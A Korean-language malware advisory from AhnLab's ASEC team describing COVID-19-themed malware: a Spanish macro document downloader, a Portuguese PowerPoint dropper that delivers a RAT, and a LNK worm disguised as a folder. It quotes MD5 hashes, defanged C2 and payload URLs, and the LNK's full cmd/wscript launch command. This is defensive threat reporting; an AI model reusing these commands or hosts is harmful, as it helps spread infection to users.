본문 바로가기
악성코드 정보

[주의] 코로나 바이러스와 연관된 악성코드 다수 유포

by 분석팀 2020. 3. 24.

ASEC 분석팀은 세계적으로 이슈인 코로나 바이러스와 연관된 악성 코드들이 유포되고 있는 것을 확인하였다. 문서 내용이나 파일 이름 등이 코로나 바이러스와 관련되어 있으며, 2월말부터 현재까지 다양한 형태로 꾸준히 유포되고 있다. 초기 유포되던 악성코드는 테스트용이나 조크성 파일 등으로 유포된 반면, 최근에는 백도어, 다운로더 등 다양한 유형의 악성코드로 유포되고 있어 사용자의 큰 주의가 필요하다.

 

2020/02/25 [주의] 코로나 바이러스를 이용한 다양한 형태의 악성코드 유포

 

[주의] 코로나 바이러스를 이용한 다양한 형태의 악성코드 유포

전 세계적으로 이슈인 코로나 바이러스를 이용한 악성코드들이 다수 발견되고 있다. 테스트 파일, JOKE 파일, 실제 악성 파일까지 다양하게 존재하며 현재 코로나 바이러스의 관심도가 높은 상황에서 이러한 악성..

asec.ahnlab.com

 

[1] 코로나19 예방법 위장 악성코드

  • 파일명: Medidas Preventivas contra el COVID-19.doc
  • MD5: 6862a4ed7c8e3341fed411245028b35b
  • 진단명: W97M/Downloader

 해당 문서에는 코로나 19 예방과 관련된 주의 사항이 스페인어로 작성되어 있다. 얼핏 보기에는 정상 문서처럼 보이지만 문서의 내부에는 매크로 스크립트가 존재하며, 이를 실행할 경우 악성 행위를 수행한다.

그림 1  악성 문서 내부 내용

 

문서 내부에는 다음과 같은 매크로 객체가 있으며, 인코딩된 명령어를 PowerShell을 통해 실행한다.

그림 2  문서 내부 악성 매크로

 

다음 그림은 실행되는 파워쉘 코드가 최종적으로 복호화 된 모습이다. 자신이 로딩된 PowerShell.exe 프로세스에 쉘 코드를 쓰고 실행한다.

그림 3  최종 스크립트  (Powershell)

 

쉘 코드는 C2서버로 접속 후 추가적인 쉘 코드를 다운로드 받아 실행하는 기능을 수행하며 연결에 성공할 때까지 반복한다. 현재는 C2서버가 작동하지 않아 확인 불가능하다.

접속 시도하는 C2는 다음과 같다.

http://0[.]tcp[.]ngrok[.]io[:]15093/_Z4GsE-DPOW1jrSP6_udWQy5CCet6

 

 

[2] 코로나19 와 관련된 매크로 악성코드

  • 파일명 : Relação de Hotéis e Hospedes - Estado afetado pelo COVID-19 (Novo Corona vírus).pps
  • MD5 : 90e495357a4c9a4bb1e9cab4b9664367
  • 진단명 : Downloader/Ppt.Generic

해당 악성코드는 코로나 바이러스와 관련된 파일명으로 유포되어 사용자의 실행을 유도하는 ppt 형태의 파일이다. 매크로 코드는 아래와 같으며, 실행시 mshta 를 통해 hxxps://omecanism2.sslblindado.com/coronavirus.mp3 해당 주소의 스크립트(VBS)를 실행하게 된다.

그림 4  문서 내부 악성 매크로

 

실행되는 스크립트는 인코딩된 pe 데이터를 포함하고 있으며, 해당 데이터를 레지스트리에 등록 한다. 등록된 데이터는 powershell 명령어를 통해 디코딩 후 메모리에 Load 되어 실행된다. 로드되어 실행되는 실제 데이터는 RAT 유형의 악성코드이며 V3 에서 Malware/Win32.RL_SpyGate 으로 진단 중이다.

그림 5 VBS  코드

 

[3] 코로나19와 관련된 Worm 악성코드

  • 파일명 : Covid 19.lnk
  • MD5 : ba3f0d0603a030fd64f5d15fc14ed34e
  • 진단명: LNK/Runner

그림 6 LNK  파일 속성

"C:\Windows\system32\cmd.exe" /c start wscript /e:VBScript.Encode Manuel.doc & start explorer Covid" "19 & exit

1 LNK 파일의 바로가기 명령어

 

해당 LNK 파일은 폴더 아이콘을 가장하였으며, 더블 클릭 시 인코딩된 VB 스크립트인 Manuel.doc 파일을 실행 후 실제 폴더처럼 보이도록 Covid 19 폴더를 오픈한다. 해당 악성코드는 Forbix 웜(Worm) 악성코드와 유사하며 실행되는 스크립트에 따라 추가 악성 행위를 수행할 수 있다.

 

댓글